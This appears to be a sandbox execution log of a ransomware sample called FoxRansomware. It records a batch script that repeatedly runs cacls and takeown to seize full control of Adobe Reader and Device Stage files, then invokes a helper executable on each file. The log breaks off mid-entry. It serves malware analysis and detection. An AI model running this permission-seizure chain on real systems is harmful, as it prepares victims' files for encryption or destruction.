C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:3928
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:3296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵
- Modifies file permissions
PID:3268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "pmd.cer" -nobanner3⤵PID:2800
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "pmd.cer" -nobanner4⤵PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:1580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:3104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵PID:3084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:2348
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:2988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:4100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:2752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
- Modifies file permissions
PID:2084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "pdf.gif" -nobanner3⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "pdf.gif" -nobanner4⤵PID:1760
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:3316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵
- Modifies file permissions
PID:2888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "server_issue.gif" -nobanner3⤵PID:2124
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "server_issue.gif" -nobanner4⤵PID:3152
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:2780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:2708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:3572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:3804
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:896
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:4032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:4128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:3684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:2180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:2764
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:2072
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:2992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:3780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "zx______.pfm" -nobanner3⤵PID:3272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "zx______.pfm" -nobanner4⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:2128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:3100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:2896
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:3076
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:3440
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:3796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵
- Modifies file permissions
PID:1008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "can32.clx" -nobanner3⤵PID:3160
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "can32.clx" -nobanner4⤵PID:2100
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:2400
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:1468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵PID:4212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "symbol.txt" -nobanner3⤵PID:2584
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "symbol.txt" -nobanner4⤵PID:3164
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:4276
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:4304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:3340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:4328
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:4300
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4272
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:4416
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:4392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵PID:4376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "watermark.png" -nobanner3⤵PID:3772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "watermark.png" -nobanner4⤵PID:4396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3344
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:4452
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:4468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:4524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:4512
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:4440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:1040
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:4584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵PID:820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:4660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:4700
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:4352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- Modifies file permissions
PID:4696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:4484
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:4760
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵PID:4628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:4676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵
- Modifies file permissions
PID:2212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "br.gif" -nobanner3⤵PID:4724
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "br.gif" -nobanner4⤵PID:4888
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1116
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:4800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:4824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵
- Modifies file permissions
PID:564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "form_responses.gif" -nobanner3⤵PID:4928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "form_responses.gif" -nobanner4⤵PID:4836
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:3500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:4984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵PID:2592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "review_email.gif" -nobanner3⤵PID:5024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "review_email.gif" -nobanner4⤵PID:5016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:5000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:4988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵
- Modifies file permissions
PID:4900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tr.gif" -nobanner3⤵PID:5020
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "tr.gif" -nobanner4⤵PID:5112
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:5080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:5052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:4876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:4968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:3996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:3276
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:5084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:2404
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:3932
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3200
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:4940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:3868
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵PID:3664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:3748
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:2468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:1748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵PID:2112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "can.fca" -nobanner3⤵PID:3984
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "can.fca" -nobanner4⤵PID:3992
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:1492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵
- Modifies file permissions
PID:1532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "usa03.ths" -nobanner3⤵PID:2284
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "usa03.ths" -nobanner4⤵PID:3896
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:2928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵
- Modifies file permissions
PID:1404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:2948
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:3716
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:1132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:1176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵
- Modifies file permissions
PID:3844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:3672
-
